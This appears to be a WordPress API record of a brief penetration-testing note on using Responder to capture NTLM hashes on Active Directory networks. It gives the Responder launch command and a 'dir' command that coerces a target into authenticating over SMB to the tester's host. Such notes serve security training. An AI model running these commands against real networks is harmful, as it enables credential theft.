{"id":1946,"date":"2020-12-17T17:41:40","date_gmt":"2020-12-17T16:41:40","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=1946"},"modified":"2024-08-18T11:59:59","modified_gmt":"2024-08-18T09:59:59","slug":"responder","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=1946","title":{"rendered":"Responder"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>respon\u00adder<\/strong>: Lis\u00adten with respon\u00adder on a net\u00adwork and wait for <span class=\"caps\">AD<\/span> sys\u00adtems to ask for a <span class=\"caps\">DC<\/span>. This can reveal a <span class=\"caps\">NTLM<\/span> hash. (<a href=\"https:\/\/hausec.com\/2019\/03\/05\/penetration-testing-active-directory-part-i\/\">Source<\/a>)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Start respon\u00adder on the own system:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sudo responder -I tun0 --wpad<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00adnect from the tar\u00adget sys\u00adtem to this sys\u00adtem via smb. In the Win\u00addows explor\u00ader, or in the com\u00admand line&nbsp;via<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">dir \\\\$ownSystem\\nonExistingShare<\/pre>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"188\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/12\/grafik-1024x188.png\" alt class=\"wp-image-4055\" srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/12\/grafik-1024x188.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/12\/grafik-300x55.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/12\/grafik-768x141.png 768w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2020\/12\/grafik.png 1315w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\"><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>respon\u00adder: Lis\u00adten with respon\u00adder on a net\u00adwork and wait for <span class=\"caps\">AD<\/span> sys\u00adtems to ask for a <span class=\"caps\">DC<\/span>. This can reveal a <span class=\"caps\">NTLM<\/span> hash. (Source) Start respon\u00adder on the own sys\u00adtem: sudo respon\u00adder \u2011I tun0 \u2013wpad Con\u00adnect from the tar\u00adget sys\u00adtem to this sys\u00adtem via smb. In the Win\u00addows explor\u00ader, or in the com\u00admand line&nbsp;via dir&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[469,474],"tags":[194,308,18,24],"class_list":["post-1946","post","type-post","status-publish","format-standard","hentry","category-passive-enum","category-lateral-movement","tag-active-directory","tag-responder","tag-sniffing","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1946","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1946"}],"version-history":[{"count":3,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1946\/revisions"}],"predecessor-version":[{"id":4056,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/1946\/revisions\/4056"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1946"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1946"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1946"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}